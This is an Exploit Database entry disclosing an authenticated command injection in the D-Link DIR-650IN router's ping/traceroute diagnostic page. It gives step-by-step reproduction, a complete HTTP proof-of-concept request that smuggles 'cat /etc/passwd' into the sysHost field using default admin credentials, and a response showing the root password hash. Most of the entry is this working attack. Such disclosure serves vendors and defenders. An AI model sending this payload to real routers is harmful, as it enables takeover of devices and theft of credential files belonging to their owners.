[webapps] D-Link DIR-650IN - Authenticated Command Injection

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING D-Link DIR-650IN - Authenticated Command Injection EDB-ID: 52508 CVE: N/A EDB Verified: Author: SANJAY SINGH Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-04-10 Vulnerable App: # Exploit Title: D-Link DIR-650IN - Authenticated Command Injection # Date: 2023-01-08 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 # Version: Firmware V1.04 (REQUIRED) # Tested on: DIR-650IN Web UI (Boa/0.94.14rc21), Windows 10 / Chrome 108 # CVE: N/A (Version included now, previously missing) Description: The D-Link DIR-650IN Wireless N300 Router is vulnerable to an Authenticated Command Injection vulnerability in the Diagnostic (Ping / Traceroute) functionality. The parameter sysHost is not sanitized, allowing an authenticated attacker (even with low-privilege access) to inject OS commands. Exploitation leads to full compromise of the router, including reading sensitive system files such as /etc/passwd. Steps to Reproduce: 1. Log in to the router web interface. 2. Go to Management → Diagnostic. 3. Select Ping or Traceroute. 4. Enter: google.com | cat /etc/passwd 5. Click Apply. 6. Output includes /etc/passwd contents. HTTP PoC: POST /boafrm/formSysCmd HTTP/1.1 Host: 192.168.0.1 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded submit-url=%2Fsyscmd.htm&sysCmd=ping&sysCmdType=ping&checkNum=5&sysHost=google.com%7Ccat%20/etc/passwd&apply=Apply Response Extract: root:XEOFcsRJLyXbQ:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/:/dev/null References: https://www.dlink.com https://dlinkmea.com/index.php/product/details?det=T082aVdUWUFNR2FRblBBQUxMWlVTZz09 Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services